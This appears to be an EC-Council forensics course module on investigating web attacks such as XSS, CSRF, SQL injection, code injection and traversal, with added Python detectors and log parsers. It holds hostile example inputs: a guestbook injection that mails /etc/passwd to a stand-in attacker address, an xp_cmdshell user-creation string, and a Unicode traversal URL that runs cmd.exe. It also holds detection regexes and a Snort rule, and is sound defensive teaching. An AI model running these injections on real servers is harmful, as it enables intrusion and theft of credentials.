File000143
- 2. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
News: Web Application Hacks - Upping The Arms Race
Source: http://www.informationweek.com/
- 3. EC-Council
News: Mystery Web Attack Hijacks Your Clipboard
Source: http://www.theregister.co.uk/
- 4. EC-Council
News: Georgian Web Attacks are the Work of Kids
Source: http://www.theinquirer.net/
- 5. EC-Council
Scenario
Three Russian citizens were charged with extorting money from U.K. e-commerce companies on October 4, 2006. Ivan Maksakov, Alexander Petrov, and Denis Stepanov were accused of receiving $4 million from UK firms. The trio concentrated on U.K. Internet gambling sites, collecting information about British web casinos and bookmakers' offices using spy software designed by one of the members, and then demanded ransoms from the owners of those websites by threatening them with Denial-of-Service attacks.
In six months of activity, the accused attacked over 54 web servers in 30 different countries. The U.K. National Hi-Tech Crime Unit (NHTCU) and the Russian authorities investigated this case and arrested them.
- 6. EC-Council
Case Study: Word Flaw Hit With Zero-Day Attack
- 7. EC-Council
Module Objective
This module will familiarize you with:
• Indications of a Web Attack
• Types of Web Attacks
• Overview of Web Logs
• Investigation of Web Attacks
• Investigation of FTP Servers
• Investigation of IIS Logs
• Investigation of Web Attacks in Windows-based Servers
• Web Page Defacement
• Investigation of DNS Poisoning
• Investigation of Static and Dynamic IP Addresses
• Checklist for Security to Web Attacks
• Tools for Web Attack Investigations
- 8. EC-Council
Module Flow
Indications of a Web Attack
Types of Web Attacks
Overview of Web Logs
Investigation of Web Attacks
Investigation of FTP Servers
Investigation of IIS Logs
Investigation of Web Attacks in Windows-based Servers
Web Page Defacement
Investigation of DNS Poisoning
Investigation of Static and Dynamic IP Addresses
Checklist for Security to Web Attacks
Tools for Web Attack Investigations
- 9. EC-Council
Indications of a Web Attack
Customers reporting to an organization that they are not able to access its online service
A legitimate web page being redirected to an unknown website
Frequent rebooting of the server
Anomalies found in the log files
- 10. EC-Council
Types of Web Attacks
Cross-Site Scripting (XSS) Attack
Cross-Site Request Forgery (CSRF)
SQL Injection
Code Injection
Command Injection
Parameter Tampering
Cookie Poisoning
Buffer Overflow
Cookie Snooping
- 11. EC-Council
Types of Web Attacks (cont’d)
DMZ Protocol Attack
Zero Day Attack
Authentication Hijacking
Log Tampering
Web Services Attack
Directory Traversal
Cryptographic Interception
URL Interpretation
Impersonation Attack
- 12. EC-Council
Cross-Site Scripting (XSS)
Cross Site Scripting (XSS or CSS) is an application layer hacking technique
It occurs when a dynamic web page collects malicious data from a user and displays the input on the page without properly validating it
Cross Site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page and trick the user into executing the script on his machine in order to gather data
The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user's system
- 13. EC-Council
Investigating Cross-Site Scripting (XSS)
Regular expression for a simple CSS attack:
The regular expression below checks for attacks that may contain HTML opening and closing tags (<>) with any text inside, and their hex equivalents
• /((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)/ix
• ((%3C)|<) - checks for the opening angle bracket or its hex equivalent
• ((%2F)|/)* - the forward slash of a closing tag, or its hex equivalent
• [a-z0-9%]+ - checks for an alphanumeric string inside the tag, or the hex representation of one
• ((%3E)|>) - checks for the closing angle bracket or its hex equivalent
Snort signature:
• alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"NII Cross-site scripting attempt"; flow:to_server,established; pcre:"/((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)/i"; classtype:web-application-attack; sid:9000; rev:5;)
- 14. EC-Council
Investigating Cross-Site Scripting (XSS) (cont'd)
Regular expression for "<img src" CSS attack:
• /((%3C)|<)((%69)|i|(%49))((%6D)|m|(%4D))((%67)|g|(%47))[^\n]+((%3E)|>)/i
• ((%3C)|<) - checks for the opening angle bracket or its hex equivalent
• ((%69)|i|(%49))((%6D)|m|(%4D))((%67)|g|(%47)) - checks for the letters 'img' in varying combinations of ASCII, or upper or lower case hex equivalents
• [^\n]+ - checks for any character other than a newline following the <img
• ((%3E)|>) - closing angle bracket or its hex equivalent
Paranoid regex for CSS attacks:
• /((%3C)|<)[^\n]+((%3E)|>)/i
• It simply looks for the opening HTML tag, or its hex equivalent, followed by one or more characters other than a newline, and then the closing tag or its hex equivalent
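The three patterns above, as an added example applied to request URIs (not code from the original module): the patterns are transcribed from the slides with the newline class written as `[^\n]`, and the sample URIs are constructed.

```python
import re

# The module's three XSS signatures, transcribed from the slides. Python's
# re.IGNORECASE stands in for the /i flag; the /x flag on the first pattern
# changes nothing because that pattern contains no whitespace.
SIMPLE_TAG_RE = re.compile(r"((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)", re.IGNORECASE)
IMG_TAG_RE = re.compile(
    r"((%3C)|<)((%69)|i|(%49))((%6D)|m|(%4D))((%67)|g|(%47))[^\n]+((%3E)|>)",
    re.IGNORECASE,
)
PARANOID_RE = re.compile(r"((%3C)|<)[^\n]+((%3E)|>)", re.IGNORECASE)

SIGNATURES = [
    ("simple-tag", SIMPLE_TAG_RE),
    ("img-tag", IMG_TAG_RE),
    ("paranoid", PARANOID_RE),
]


def classify(request_uri: str) -> list:
    """Return the names of the signatures that fire on one request URI."""
    return [name for name, rx in SIGNATURES if rx.search(request_uri)]


def scan(request_uris) -> list:
    """Run every URI through the signatures; return [(uri, [signature names])] for hits only."""
    hits = []
    for uri in request_uris:
        fired = classify(uri)
        if fired:
            hits.append((uri, fired))
    return hits


# Constructed request URIs (not from the page): literal and %-encoded tags,
# an <img> payload in mixed ASCII/hex, and two benign inputs.
SAMPLE_URIS = [
    "/search.asp?q=<script>alert(1)</script>",            # literal tag
    "/search.asp?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E",  # same, URL-encoded
    "/profile.asp?bio=<IMG SRC=javascript:alert(1)>",     # <img ...> with attributes
    "/profile.asp?bio=%3C%49%4D%47%20src%3Dx%3E",         # <IMG src=x> entirely in hex
    "/calc.asp?expr=1<2+and+3>2",                          # benign, but looks like a tag
    "/page.asp?id=5",                                      # benign
]

if __name__ == "__main__":
    for uri, fired in scan(SAMPLE_URIS):
        print(f"{', '.join(fired):32s} {uri}")
```

The last two results show the trade-off the slides describe: the paranoid pattern catches the `<IMG ...>` payload the simple pattern misses, but also fires on the harmless `1<2 and 3>2`.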
- 15. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Cross-Site Request Forgery (CSRF)
Attacker forces the victim to submit his form data to the victim’s
web server
Attacker takes an arbitrary action as soon as the victim takes
preventive measures against the web site
It targets the images that are generally found on Internet forums
• Exploit site's trust in a user
• Involve sites that rely on the user's identity
• Trick a user into sending HTTP requests to a site
• Involve HTTP requests that has side-effects
It can:
- 16. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Anatomy of CSRF Attack
• Attacker hosts a web page with pre-
populated HTML form data
Step 1
• Victim browses the attacker’s HTML
form
Step 2
• Web page automatically submits that
pre-populated form data to a site where
the victim has access
Step 3
• Site authenticate request (attacker’s
form data) come from victims
Step 4
• Attacker’s form data is accepted by the
server since it was sent from a
legitimate user
Result
- 17. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Pen-Testing CSRF Validation Fields
• Verify that the validation field is unique for each user
Test 1
• Verify that the validation field cannot be determined by other users
• If an attacker can create same validation field for another user, there is
no value in the validation field
• Validation field must be unique for each site
Test 2
• Verify that the validation field is never sent on the query string
• This data could be leaked in places like HTTP referrer to attacker
Test 3
• Verify request fails when validation field is missing
Test 4
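A validation field that satisfies the four tests above, as an added example rather than anything from the module: the token scheme (a random nonce plus an HMAC over session id and nonce under a server-side secret), the field name `csrf_token`, and the `/transfer` endpoint are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Assumption: one secret per deployment, kept server-side and never sent to clients.
SERVER_SECRET = secrets.token_bytes(32)
TOKEN_FIELD = "csrf_token"  # assumed name of the hidden form field (the "validation field")


def issue_token(session_id: str) -> str:
    """Mint a validation field for one session: random nonce + HMAC over (session, nonce).

    Binding the MAC to the session id makes the token unique per user (Test 1) and,
    because SERVER_SECRET is unknown to clients, impossible for another user to
    compute (Test 2).
    """
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def token_is_valid(session_id: str, token: str) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def handle_state_change(method: str, url: str, form: dict, session_id: str):
    """Simulated state-changing endpoint. Returns (HTTP status, reason).

    session_id is what the server recovered from the session cookie, which the browser
    attaches automatically; that is exactly why the token must be checked as well.
    """
    if method != "POST":
        return 405, "state changes must be POSTed"
    if TOKEN_FIELD in parse_qs(urlsplit(url).query):
        # Test 3: a token on the query string can leak through the Referer header
        return 400, "validation field must not travel on the query string"
    token = form.get(TOKEN_FIELD)
    if token is None:
        return 403, "validation field missing"                       # Test 4
    if not token_is_valid(session_id, token):
        return 403, "validation field not issued to this session"  # Tests 1 and 2
    return 200, "accepted"


if __name__ == "__main__":
    victim_token = issue_token("sess-victim")
    # Steps 1-3 of the anatomy: the attacker's page auto-submits pre-populated data from
    # the victim's browser. The session cookie rides along; a valid token cannot.
    print(handle_state_change("POST", "/transfer", {"to": "attacker", "amount": "100"}, "sess-victim"))
    # Same form with the attacker's own token (valid only for the attacker's session) copied in.
    print(handle_state_change("POST", "/transfer",
                              {"to": "attacker", "amount": "100", TOKEN_FIELD: issue_token("sess-attacker")},
                              "sess-victim"))
    # Legitimate submission from the server's own form.
    print(handle_state_change("POST", "/transfer",
                              {"to": "savings", "amount": "100", TOKEN_FIELD: victim_token},
                              "sess-victim"))
```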
- 18. EC-Council
SQL Injection Attacks
SQL injection is a type of security exploit in which the attacker adds SQL code to a Web form input box to gain access to the database resources
For example, in a search page, the developer may execute a query (VBScript/ASP) using the code:
• Set myRecordset = myConnection.execute("SELECT * FROM myTable WHERE someText ='" & request.form("inputdata") & "'")
If an input such as blah' or 1=1 -- is supplied in the search page, the string concatenation in the ASP produces the query:
• SELECT * FROM myTable WHERE someText ='blah' or 1=1 --'
• The WHERE clause of this statement always evaluates to true, so the query returns the whole recordset; the trailing quote is discarded by the -- comment
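The slide's concatenated query replayed against an in-memory SQLite table, as an added example (not the module's code): `myTable` and its three rows are constructed, and the parameterized version shows the fix.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the slide's myTable (not the page's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE myTable (id INTEGER PRIMARY KEY, someText TEXT)")
    conn.executemany("INSERT INTO myTable (someText) VALUES (?)",
                     [("apple",), ("banana",), ("cherry",)])
    return conn


def build_vulnerable_sql(inputdata: str) -> str:
    """Same string concatenation as the VBScript/ASP line on the slide."""
    return "SELECT * FROM myTable WHERE someText ='" + inputdata + "'"


def search_vulnerable(conn: sqlite3.Connection, inputdata: str) -> list:
    """Executes the concatenated statement: attacker-controlled text becomes SQL."""
    return conn.execute(build_vulnerable_sql(inputdata)).fetchall()


def search_parameterized(conn: sqlite3.Connection, inputdata: str) -> list:
    """The fix: the value is bound as a parameter, so quotes and -- stay data."""
    return conn.execute("SELECT * FROM myTable WHERE someText = ?", (inputdata,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    payload = "blah' or 1=1 --"                 # the slide's input, with the quote that closes the literal
    print(build_vulnerable_sql(payload))        # SELECT * FROM myTable WHERE someText ='blah' or 1=1 --'
    print(search_vulnerable(conn, "banana"))    # [(2, 'banana')]
    print(search_vulnerable(conn, payload))     # every row: the WHERE clause is always true
    print(search_parameterized(conn, payload))  # []: no row contains that literal text
```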
- 19. EC-Council
Investigating SQL Injection Attacks
Look for SQL injection attack incidents in these locations:
• IDS log files
• Database server log files
• Web server log files
The attack signature may look like:
• 12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah' or 1=1 --
• 12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah' or (1=1) --
• 12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah' or exec master..xp_cmdshell 'net user test testpass --
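Scanning log lines in the slide's layout for the signatures above, as an added example that is not part of the module; the log lines are constructed (the first three follow the slide's examples) and the indicator patterns are my own.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Indicators drawn from the signature lines on the slide: a quote-closing
# tautology, SQL comment markers, exec/xp_cmdshell, and UNION SELECT.
INDICATORS = [
    ("tautology", re.compile(r"'\s*or\s+\(?\s*\d+\s*=\s*\d+", re.IGNORECASE)),
    ("comment", re.compile(r"--|/\*")),
    ("exec", re.compile(r"\b(exec|execute)\b", re.IGNORECASE)),
    ("xp_cmdshell", re.compile(r"xp_cmdshell", re.IGNORECASE)),
    ("union-select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.IGNORECASE)),
]

# Constructed log lines in the slide's layout (time, client IP, method, URI),
# URL-encoded the way a web server records them; not the page's own log.
SAMPLE_LOG = """\
12:34:35 192.2.3.4 GET /login.asp?username=blah'%20or%201=1%20--
12:34:35 192.2.3.4 GET /login.asp?username=blah'%20or%20(1=1)%20--
12:34:36 192.2.3.4 GET /login.asp?username=blah'%20or%20exec%20master..xp_cmdshell%20'net%20user%20test%20testpass%20--
12:35:01 10.1.1.7 GET /login.asp?username=alice
12:35:02 10.1.1.7 GET /search.asp?q=rock%20or%20roll
"""


def parse_line(line: str):
    """Split one log line into its fields; return None for malformed lines."""
    parts = line.split(None, 3)
    if len(parts) != 4:
        return None
    time, ip, method, uri = parts
    return {"time": time, "ip": ip, "method": method, "uri": unquote(uri)}


def scan_log(text: str) -> list:
    """Return a finding (fields + indicator names) for every line that trips an indicator.

    Matching runs on the URL-decoded URI so %27/%20 encoding does not hide the payload.
    """
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        fired = [name for name, rx in INDICATORS if rx.search(rec["uri"])]
        if fired:
            rec["indicators"] = fired
            findings.append(rec)
    return findings


def suspects_by_ip(findings) -> dict:
    """Count flagged requests per client address: the starting point for localizing the source."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["time"], f["ip"], ", ".join(f["indicators"]), f["uri"])
    print(suspects_by_ip(found))
```

The benign search for `rock or roll` is not flagged because the tautology indicator requires the closing quote and a numeric comparison, not the word `or` alone.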
- 20. EC-Council
News: SQL Injection Attacks Against Databases Rise Sharply
Source: http://computerworld.com/
Info-theft attempts up nearly 40-fold since beginning of year
- 21. EC-Council
Code Injection Attack
A code injection attack is similar to an SQL injection, but instead of SQL commands, attackers pass other types of malicious code, such as PHP scripts and shell commands, to the web form input box of an application
The purpose of the injected code is to bypass or modify the intended functionality of the program
In this attack, arbitrary code is executed on the target server
• Example: A web server has a "Guest book" script which receives short messages such as:
• It is a nice site!
• An attacker may instead insert the message "; cat /etc/passwd | mail attacker@attacker.com #", which steals the password file from the web server and e-mails it to the attacker
- 22. EC-Council
Investigating Code Injection Attack
An executable-instruction detector in an Intrusion Detection System (IDS), together with a series of sandbox execution environments provided by the operating systems in the network, is used to detect code injection attacks
The IDS identifies series of executable instructions and sends the suspicious packet's payload to the execution environment matching the packet's destination
The proper execution environment is determined by examining the destination IP address of the incoming packet
The payload is executed in the corresponding monitored environment, and a report containing the payload's OS resource usage is returned to the IDS
If the report contains evidence of resource usage, the IDS generates an alert; otherwise the packet is considered non-malicious
- 23. EC-Council
Parameter Tampering
Parameter tampering is a form of web attack in which certain parameters in the URL entered by a user are changed during the exchange between the client and the web server, without the user's authorization
By modifying the arguments (parameters) in the query, the attacker can navigate through the web and database servers and retrieve or modify their contents
- 24. EC-Council
Cookie Poisoning
Cookie poisoning attacks involve the modification of the contents of a cookie in order to steal a user's personal information
Cookies stored on the computer's hard drive maintain bits of information that allow web sites to authenticate the user's identity, speed up transactions, monitor behavior, and personalize web services
Stolen personal information is generally used for other malicious attacks such as identity theft and online fraud
- 25. EC-Council
Investigating Cookie Poisoning Attack
Trace the set-cookie commands issued by the web server, and store information such as the cookie name, cookie value, client IP address, and the session to which that cookie was assigned
Intercept each HTTP request sent to the web server, retrieve the cookie information from it, and check it against all stored cookies
A change in the contents of a cookie indicates that an attack has occurred
Figure: attacker sends an invalid cookie to the server
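The monitoring approach described above, as an added example rather than the module's code: the session cookie name `SESSIONID`, the traffic, and the IP addresses are constructed.

```python
SESSION_COOKIE = "SESSIONID"   # assumed name of the server's session cookie


class CookieMonitor:
    """Records every cookie the server sets and checks each later request against it.

    State: (session id, cookie name) -> (value as issued, client IP it was issued to).
    """

    def __init__(self):
        self.issued = {}

    @staticmethod
    def _parse_pairs(header: str):
        """Yield (name, value) pairs from a Cookie or Set-Cookie header value."""
        for part in header.split(";"):
            name, sep, value = part.strip().partition("=")
            if sep:
                yield name.strip(), value.strip()

    def record_set_cookie(self, session_id: str, client_ip: str, set_cookie: str):
        """Called for each Set-Cookie line in a response. Only the first pair is the
        cookie; the rest (Path, HttpOnly, ...) are attributes and are ignored."""
        name, value = next(self._parse_pairs(set_cookie))
        self.issued[(session_id, name)] = (value, client_ip)

    def check_request(self, client_ip: str, cookie_header: str) -> list:
        """Compare the cookies a request carries with what the server issued; return alerts."""
        cookies = dict(self._parse_pairs(cookie_header))
        session_id = cookies.get(SESSION_COOKIE)
        if session_id is None:
            return ["request carries no session cookie"]
        alerts = []
        for name, value in cookies.items():
            known = self.issued.get((session_id, name))
            if known is None:
                alerts.append(f"cookie {name!r} was never issued to session {session_id}")
                continue
            issued_value, issued_ip = known
            if value != issued_value:
                alerts.append(f"cookie {name!r} changed: issued {issued_value!r}, received {value!r}")
            if client_ip != issued_ip:
                alerts.append(f"cookie {name!r} issued to {issued_ip} but presented from {client_ip}")
        return alerts


if __name__ == "__main__":
    # Constructed traffic: the server issues two cookies to one client, then the
    # monitor sees a normal request, a tampered role cookie, and a replay from
    # another address.
    monitor = CookieMonitor()
    monitor.record_set_cookie("abc123", "203.0.113.5", "SESSIONID=abc123; Path=/; HttpOnly")
    monitor.record_set_cookie("abc123", "203.0.113.5", "role=user; Path=/")
    print(monitor.check_request("203.0.113.5", "SESSIONID=abc123; role=user"))
    print(monitor.check_request("203.0.113.5", "SESSIONID=abc123; role=admin"))
    print(monitor.check_request("198.51.100.9", "SESSIONID=abc123; role=user"))
```

The IP comparison is the noisiest of the three checks: clients behind a changing NAT or proxy pool will trip it without any tampering, so treat it as corroboration rather than proof.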
- 26. EC-Council
Buffer Overflow/Cookie Snooping
Buffer Overflow:
• A buffer overflow is the result of writing more data into a buffer than the buffer can hold
• In such attacks, the extra data may contain code designed to trigger specific actions, sending new instructions to the attacked computer that damage the user's files, change data, or disclose confidential information
• Attackers attempt to overflow vulnerable backend servers with excess requests, and can often execute commands directly on the compromised server
Cookie snooping:
• The attacker decodes the user's credentials, logs on as an authorized user, and gains access to sensitive information
- 27. EC-Council
Detecting Buffer Overflow
Nebula (NEtwork-based BUffer overfLow Attack detection)
technique detects buffer overflow attacks based solely on the traffic
observed without requiring any modifications to the end hosts
Nebula uses a generalized signature that can capture all known
variants of buffer overflow attacks while reducing the number of false
positives to a negligible level
- 28. EC-Council
DMZ Protocol Attack/Zero Day Attack
DMZ Protocol Attack:
• Most web applications include protocols such as DNS and FTP; these protocols have many inherent vulnerabilities and are exploited to gain access to other critical applications
Zero day Attack:
• It refers to exploits that take advantage of a newly discovered vulnerability in a program or operating system before the software developer finds a solution for that vulnerability
- 29. EC-Council
Authentication Hijacking
Authentication prompts a user to supply the credentials
that allow access to the application
Enforcing a consistent authentication policy between
multiple and disparate applications can prove to be a real
challenge
An authentication hijacking can lead to theft of service,
session hijacking, and user impersonation
- 30. EC-Council
Investigating Authentication Hijacking
Check whether the browser remembers the password (a common mistake many users make when selecting 'remember password' options)
Check whether the user failed to log off from the application
- 31. EC-Council
Log Tampering
Logs are kept to track the usage patterns of the application
Log tampering allows attackers to cover their tracks or alter web transaction records
Attackers try to delete logs, modify logs, change user information, or otherwise destroy evidence of an attack
- 32. EC-Council
Directory Traversal
Directory traversal occurs when the attacker is able to browse directories and files outside the normal application access
The attack exposes the directory structure of the application, and often the underlying web server and operating system
The attacker can enumerate contents, access secure or restricted pages, gain confidential information, and locate the source code
- 33. EC-Council
Cryptographic Interception
Using cryptography, confidential messages can be securely exchanged between two parties
Encrypted traffic flowing through network firewalls and IDS systems is not inspected
The attacker takes advantage of a secure channel to exploit it more efficiently than an open channel
- 34. EC-Council
URL Interpretation and Impersonation Attack
URL Interpretation:
• A web server failing to parse a correct URL is termed URL interpretation
• Example: Unicode or superfluous decode attacks
Impersonation Attack:
• An impersonation attack is an attack in which an attacker spoofs web applications by pretending to be a legitimate user
- 35. EC-Council
Overview of Web Logs
Log files come in handy when detecting web attacks
The source, nature, and time of the attack can be determined by analyzing the log files of the compromised system
Log files contain HTTP status codes that are specific to the type of incident
Web servers that run on IIS or Apache are prone to log file deletion by attackers who have access to the web server, as the log files are stored on the web server itself
- 36. EC-Council
Investigating Web Attacks
1. Analyze web server, FTP, and local system logs to confirm a web attack
2. Check log file information with respect to time/time stamps, IP address, HTTP status code, and requested resource
3. Identify the nature of the attack. Is it a DDoS attack, or an attack targeted just at you? Is someone trying to shut down your network altogether, or attempting to infiltrate individual machines?
4. Localize the source
5. Use your firewall and IDS logs to learn where the attack is coming from (or came from!)
6. This will help you identify whether the attack/penetration is coming from a compromised host on your network or from the outside world
- 37. EC-Council
Investigating Web Attacks (cont'd)
7. Block the attack
8. Once you know where the attack is coming from, you can take action to stop it
9. If you have identified specific machines that have been compromised, pull them from the network until you can disinfect them and return them to service
10. If an attack or attempted attack is coming from outside, block access to the network from that IP address
11. START YOUR INVESTIGATION - from the IP address!
- 38. EC-Council
Example of FTP Compromise
Attacker runs port scanning:
#nmap -O 23.3.4.5 -p 21
Starting nmap Interesting ports
Port State Service
21/tcp open ftp
80/tcp open www
Remote OS is Windows 2000
The attacker connects using ftp:
ftp 23.3.4.5
Connected to 23.3.4.5
Username:administrator
Password:
- 39. EC-Council
Investigating FTP Logs
The FTP logs on Windows 2000 are stored in the directory:
• C:\WINDOWS\system32\LogFiles\MSFTPSVC1
Screenshot of an FTP log (image not reproduced)
- 40. EC-Council
Investigating FTP Servers
FTP server vulnerabilities allow an attacker to directly compromise the system hosting the FTP server
Direct compromise of an FTP server can be as simple as obtaining legitimate passwords by:
• Social engineering
• Brute-force guessing
• Network sniffing
Network and FTP logs provide records that can serve as valuable evidence
- 41. EC-Council
Investigating IIS Logs
IIS logs all visits in log files. The log files are located at <%systemroot%>\logfiles
If proxies are not used, then the client IP can be logged
This command lists the log files:
• http://victim.com/scripts/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\Winnt\system32\Logfiles\W3SVC1
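Decoding request paths like the one above to expose the overlong-UTF-8 traversal (%c0%af is '/' written in two bytes, the Unicode decode flaw of slide 34), as an added example that is not from the module; the request paths are constructed, the first modeled on the slide's URL.

```python
import re
from urllib.parse import unquote_to_bytes


def find_overlong_utf8(raw: bytes) -> list:
    """Return (offset, bytes) for every overlong UTF-8 sequence: a code point written with
    more bytes than it needs (C0/C1 leads, E0 followed by 80..9F, F0 followed by 80..8F).
    %c0%af is the overlong form of '/': a lenient decoder turns it into a separator after
    the server has already checked the raw path for '../'."""
    hits, i = [], 0
    while i < len(raw):
        b = raw[i]
        nxt = raw[i + 1] if i + 1 < len(raw) else -1
        if b in (0xC0, 0xC1) and 0x80 <= nxt <= 0xBF:
            hits.append((i, raw[i:i + 2]))
            i += 2
        elif b == 0xE0 and 0x80 <= nxt <= 0x9F:
            hits.append((i, raw[i:i + 3]))
            i += 3
        elif b == 0xF0 and 0x80 <= nxt <= 0x8F:
            hits.append((i, raw[i:i + 4]))
            i += 4
        else:
            i += 1
    return hits


def lenient_utf8(raw: bytes) -> str:
    """Decode UTF-8 the way a permissive decoder does, accepting overlong forms, so the
    investigator sees the path the attacker intended the server to see."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            n, cp = 0, b
        elif 0xC0 <= b <= 0xDF:
            n, cp = 1, b & 0x1F
        elif 0xE0 <= b <= 0xEF:
            n, cp = 2, b & 0x0F
        elif 0xF0 <= b <= 0xF7:
            n, cp = 3, b & 0x07
        else:
            n, cp = -1, 0
        tail = raw[i + 1:i + 1 + n] if n > 0 else b""
        if n < 0 or len(tail) != n or any(not 0x80 <= t <= 0xBF for t in tail):
            out.append("\ufffd")
            i += 1
            continue
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += n + 1
    return "".join(out)


def escapes_web_root(path: str) -> bool:
    """Walk the segments of a decoded path; True if '..' ever climbs above the root.
    Both separators are split on because IIS accepts '\\' as well as '/'."""
    depth = 0
    for seg in re.split(r"[\\/]+", path):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def analyse_request_path(request_uri: str) -> dict:
    """Decode the path part of a logged URI and report the traversal evidence."""
    path = request_uri.split("?", 1)[0]
    raw = unquote_to_bytes(path)
    try:
        raw.decode("utf-8")
        strict_ok = True
    except UnicodeDecodeError:
        strict_ok = False      # a strict decoder rejects what the lenient one accepts
    decoded = lenient_utf8(raw)
    return {
        "overlong": len(find_overlong_utf8(raw)),
        "strict_utf8": strict_ok,
        "decoded": decoded,
        "escapes_root": escapes_web_root(decoded),
    }


if __name__ == "__main__":
    # Constructed paths: a shortened form of the slide's request, and a legitimate UTF-8 name.
    for uri in ("/scripts/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir",
                "/docs/%C3%A9t%C3%A9.html"):
        print(uri, analyse_request_path(uri))
```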
- 42. EC-Council
Investigating Apache Logs
The Apache server has two logs, namely:
Error log:
• The Apache server saves diagnostic information and error messages that it encounters while processing requests
• The default path of this file on Linux is /usr/local/apache/logs/error_log
• It is an important piece of evidence from the investigator's point of view
• [Sat Dec 11 7:12:36 2004] [error] [client 202.116.1.3] Client sent malformed Host header
Access log:
• It contains the requests processed by the Apache server
• By default, access logs are stored in the common log format
• The default path of this file on Linux is /usr/local/apache/logs/access_log
• 202.116.1.3 - shilp [11/Dec/2004:6:23:13 -0500] "GET /apache_ft.gif HTTP/1.0" 200 1577
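A parser for the two log formats above that carries out step 2 of the investigation procedure (time stamps, IP address, HTTP status code and requested resource, per client) and ranks the sources to start from, as an added example rather than code from the module; the sample lines are constructed after the slide's examples.

```python
import re
from datetime import datetime

# Patterns for the two Apache logs shown on the slide: common log format and error_log.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<resource>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)$'
)
ERROR_RE = re.compile(
    r'^\[(?P<time>[^\]]+)\] \[(?P<level>\w+)\] \[client (?P<ip>[^\]]+)\] (?P<message>.*)$'
)

# Constructed sample lines modeled on the slide's examples (not the page's own logs).
SAMPLE_ACCESS = """\
202.116.1.3 - shilp [11/Dec/2004:06:23:13 -0500] "GET /apache_ft.gif HTTP/1.0" 200 1577
202.116.1.3 - - [11/Dec/2004:07:12:30 -0500] "GET /cgi-bin/../../../etc/passwd HTTP/1.0" 404 209
202.116.1.3 - - [11/Dec/2004:07:12:34 -0500] "GET /login.php?user=admin'%20or%201=1-- HTTP/1.0" 500 0
192.0.2.44 - - [11/Dec/2004:07:13:01 -0500] "GET /index.html HTTP/1.1" 200 4120
"""
SAMPLE_ERROR = """\
[Sat Dec 11 07:12:36 2004] [error] [client 202.116.1.3] Client sent malformed Host header
"""


def parse_access(line: str):
    """Parse one common-log-format line; None if it does not match."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def parse_error(line: str):
    """Parse one error_log line; None if it does not match."""
    m = ERROR_RE.match(line)
    return m.groupdict() if m else None


def triage(access_text: str, error_text: str) -> dict:
    """Per client IP: request count, failed (4xx/5xx) count, resources, time window,
    and the error_log messages recorded for the same client."""
    by_ip = {}
    for line in access_text.splitlines():
        rec = parse_access(line)
        if rec is None:
            continue
        e = by_ip.setdefault(rec["ip"], {"requests": 0, "errors": 0, "resources": [],
                                         "first_seen": rec["time"], "last_seen": rec["time"],
                                         "error_log": []})
        e["requests"] += 1
        if rec["status"] >= 400:
            e["errors"] += 1
        e["resources"].append(rec["resource"])
        e["first_seen"] = min(e["first_seen"], rec["time"])
        e["last_seen"] = max(e["last_seen"], rec["time"])
    for line in error_text.splitlines():
        rec = parse_error(line)
        if rec and rec["ip"] in by_ip:
            by_ip[rec["ip"]]["error_log"].append(rec["message"])
    return by_ip


def rank_sources(by_ip: dict) -> list:
    """Order client addresses by failed requests, then volume: where to start the investigation."""
    return sorted(by_ip, key=lambda ip: (by_ip[ip]["errors"], by_ip[ip]["requests"]), reverse=True)


if __name__ == "__main__":
    summary = triage(SAMPLE_ACCESS, SAMPLE_ERROR)
    for ip in rank_sources(summary):
        e = summary[ip]
        print(ip, e["requests"], "requests,", e["errors"], "failed,",
              e["first_seen"].time(), "to", e["last_seen"].time(), e["error_log"])
```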
